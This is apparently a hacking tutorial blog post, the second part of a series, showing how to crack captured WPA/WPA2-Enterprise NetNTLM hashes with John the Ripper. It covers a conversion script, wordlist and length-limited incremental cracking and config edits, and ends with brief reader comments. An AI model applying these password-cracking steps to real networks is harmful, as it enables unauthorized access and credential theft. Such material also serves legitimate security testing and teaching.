How To: Hack WPA/WPA2-Enterprise Part 2

Hack WPA/WPA2-Enterprise Part 2

In the second part of this tutorial, we are going to crack the hashes that we've captured previously. I'm going to explain how to do it with the powerful John the Ripper. It comes with Kali by default, so no need to install!

Using John the Ripper

If you don't know nothing about this tool, you can check this Wikipedia article.

First, we have to put the password hashes in a friendly format for John. To do so, we will use a simple script that puts our freeradius-credsXXXXX.txt file in John format, you can download it here.

Visit the previous link, copy the script text to your clipboard and open a terminal.
Type:

nano radiustojohn.py

Paste the text from your clipboard and hit Control + O to save the changes, then Control + X to exit. Change the permissions to the file by typing:

chmod +x radiustojohn.py

At this point execute the script with the freeradius-credsXXXXXXX.txt file as parameter:

./radiustojohn.py <path to the freeradius-creds file>

Now we've generated a freeradius.john file that John can understand. Type:

john --format=netntlm freeradius.john

At any time you can hit any key to see the status. As you can see, in about 3 seconds we've guessed 12 passwords. The weaker the password, the faster we crack it. Stronger passwords can take years to be cracked, of course you can use a custom wordlist:

john --format=netntlm --wordlist=<path to your dictionary file> freeradius.john

If you know something about the password, for example the length, you can modify the John's configuration file in order to try only passwords of that length. The configuration file is located in /etc/john/john.conf, let's make a backup of that file:

cd /etc/john/
cp john.conf john.conf.old

Now that we've made a backup of the original file, let's change it.

leafpad john.conf

At this point of the file, change the MinLen and the MaxLen for the length of the password. Imagine that you know the password's length is exactly 8, then you must put 8 in MinLen and 8 in MaxLen. Save the changes and run John:

john --format=netntlm --incremental=All freeradius.john

John also supports OpenCL to work with your GPU, which can crack so much faster.

That's all, I hope you've enjoyed! Ask any question!

4 Comments

Again great stuff, really appreciate the time you put into this :)

Cheers,
Washu

Thanks, Washu.

Thanks for this tutorials Jako!

Thank you for read it!

Share Your Thoughts

  • Hot
  • Latest